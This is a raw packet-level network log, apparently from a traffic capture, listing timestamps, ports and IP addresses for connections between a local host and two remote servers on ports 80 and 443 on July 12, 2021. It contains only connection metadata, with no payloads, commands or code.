Jul 12, 2021 10:29:35.872270107 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872308016 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872340918 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872378111 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872414112 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872447014 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872479916 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872513056 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872545004 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872576952 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872621059 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872673035 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.872734070 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.873692989 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.873753071 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.874484062 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.876586914 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876614094 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876617908 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876633883 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876643896 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876648903 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876662970 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876666069 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876669884 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876686096 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876708984 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.876713037 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.879051924 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880433083 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880475998 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880492926 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880516052 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880539894 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880565882 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880584955 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880609035 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880630016 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:35.880810022 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.885891914 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:35.932992935 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:37.466480970 CEST	49750	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:37.485507965 CEST	80	49750	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:39.509598017 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:39.738425970 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:39.738560915 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:40.832058907 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.068459034 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.068509102 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.068697929 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.304471016 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.304594994 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.305254936 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.308983088 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.535068035 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.538186073 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.539686918 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.539705038 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.539769888 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.539825916 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.542259932 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.542303085 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:41.771193027 CEST	443	49751	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:41.771367073 CEST	49751	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:42.489223003 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:42.715593100 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:42.715692997 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:42.718238115 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:42.944627047 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:42.944696903 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:42.944780111 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.171190023 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.171308041 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.172251940 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.177184105 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.401004076 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.403302908 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.406640053 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.406670094 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.406739950 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.460752010 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.460781097 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:43.687494993 CEST	443	49752	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:43.691705942 CEST	49752	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:44.379446030 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:44.607708931 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:44.610542059 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:44.610579967 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:44.840095043 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:44.841821909 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:44.841917992 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.070430994 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.070599079 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.071497917 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.074719906 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.296184063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.299873114 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.302834034 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.304466963 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.304507971 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.304543972 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.304563999 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.304939985 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.304960966 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.320158005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.320247889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.320458889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.343271017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.343360901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.365678072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.535526037 CEST	443	49754	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:45.535613060 CEST	49754	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:45.597138882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.597172022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.597268105 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.598197937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.598227978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.598294020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.599638939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.599773884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.599843979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.601119995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.601185083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.601345062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.602785110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.602816105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.602963924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.619339943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.619370937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.619657993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.620667934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.620695114 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.621063948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.622483015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.622560024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.622657061 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.623914957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.624048948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.624120951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.625431061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.625511885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.625591040 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.626982927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.627048969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.627125978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.628485918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.628546953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.628614902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.630182981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.630254030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.630326986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.631732941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.631858110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.631946087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.633291960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.633369923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.633460999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.641386032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.641495943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.641581059 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.642947912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.643853903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.643882036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.644105911 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.645287037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.645402908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.645436049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.649617910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.649679899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.649729967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.649777889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.649836063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.649857998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.650152922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.650260925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.650274992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.651781082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.651829958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.651896000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.652745008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.652822971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.652842999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.654447079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.654470921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.654550076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.655035019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.655061007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.655085087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.656213045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.656250000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.656269073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.657093048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.657152891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.657272100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.658329964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.658413887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.658670902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.658751011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.658793926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.659858942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.659898996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.659961939 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.661092997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.661128044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.661185980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.661973953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.662110090 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.662162066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.663079977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.663124084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.663180113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.664169073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.664217949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.664267063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.665149927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.665322065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.665385962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.665913105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.666088104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.666136026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.666872978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.667011976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.667052031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.667753935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.667781115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.667813063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.668355942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.668593884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.668725967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.669260025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.669385910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.669437885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.669877052 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.670068979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.670124054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.671776056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.671914101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.671955109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.672476053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.672655106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.672702074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.673214912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.673530102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.673571110 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.674245119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.674283028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.674624920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.674760103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.674958944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.675009012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.675702095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.675740957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.675803900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.676434040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.676470041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.676520109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.677325010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.677340984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.677381992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.678010941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.678152084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.678194046 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.678843021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.679079056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.679131031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.681217909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.681329012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.681366920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.681953907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.682044029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.682091951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.682115078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.683242083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.683293104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.683363914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.684334040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.684381008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.684393883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.685065985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.685097933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.685132980 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.686072111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.686122894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.686155081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.687458038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.687484026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.687508106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.688832045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.688885927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.688915968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.689218998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.689274073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.689403057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.690355062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.690383911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.690409899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.690422058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.690448999 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.690459967 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.691097975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.691149950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.691200018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.691616058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.691633940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.691669941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.691876888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.691926003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.691998959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.692034960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.692070961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.693696022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.693802118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.693850994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.694411039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.694436073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.694505930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.695374966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.695437908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.695492983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.697500944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.697566032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.697613001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.697931051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.698082924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.698124886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.698924065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.698966980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.699028969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.699814081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.699927092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.699976921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:45.700814009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:45.700881004 CEST	80	49755	47.254.186.176	192.168.2.3
